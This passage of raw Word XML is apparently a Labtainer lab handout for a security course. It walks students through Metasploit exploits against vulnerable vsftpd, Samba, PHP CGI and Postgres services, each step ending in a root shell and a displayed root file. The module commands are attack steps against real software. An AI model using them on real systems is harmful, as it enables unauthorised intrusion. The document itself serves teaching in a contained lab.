          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>View and set options as necessary (RHOST option), run the exploit and display root file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable Samba service (port 139)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Search for samba usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>search usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:tab/>
        <w:t>use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>View and set options as necessary (RHOST option), run the exploit and display root file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">9. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable HTTP (php) service (port 80)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Search for php_cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>search php_cgi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>use exploit/multi/http/php_cgi_arg_injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>View and set options as necessary (RHOST option) run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Note: when the exploit is succeeded a 'meterpreter' prompt is shown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>From meterpreter prompt, drop to a shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Sans CJK SC Regular" w:cs="FreeSans" w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Display the root file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vulnerable Postgres service (port 5432)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Search for postgres_payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>search postgres_payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Use the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t>use exploit/linux/postgres/postgres_payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>View and set options as necessary (RHOST option)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>run the exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Note: when the exploit is succeeded a 'meterpreter' prompt is shown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>From meterpreter prompt, drop to a shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Noto Sans CJK SC Regular" w:cs="FreeSans" w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
          <w:color w:val="00000A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Display root file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Stop the Labtainer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When the lab is completed, or you'd like to stop working for a while, run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tlwg Typist" w:hAnsi="Tlwg Typist"/>
        </w:rPr>
        <w:t xml:space="preserve">stoplab </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>from the host Labtainer working directory.  You can always restart the</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Labtainer to continue your work.  When the Labtainer is stopped, a</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>zip file is created and copied to a location displayed by the stoplab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>command.  When the lab is completed, send that zip file to the instructor.</w:t>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lwg Typis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 metasploit</w:t>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:t xml:space="preserve">                                                                                                                              </w:t>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:instrText> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:t>4</w:t>
    </w:r>
    <w:r>
      <w:rPr/>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p>
    <w:pPr>
      <w:pStyle w:val="Header"/>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LibreOffice/6.0.7.3$Linux_X86_64 LibreOffice_project/00m0$Build-3</Application>
  <Pages>4</Pages>
  <Words>559</Words>
  <Characters>3156</Characters>
  <CharactersWithSpaces>4083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2018-06-13T08:47:23Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-12-23T15:19:46Z</dcterms:modified>
  <cp:revision>12</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>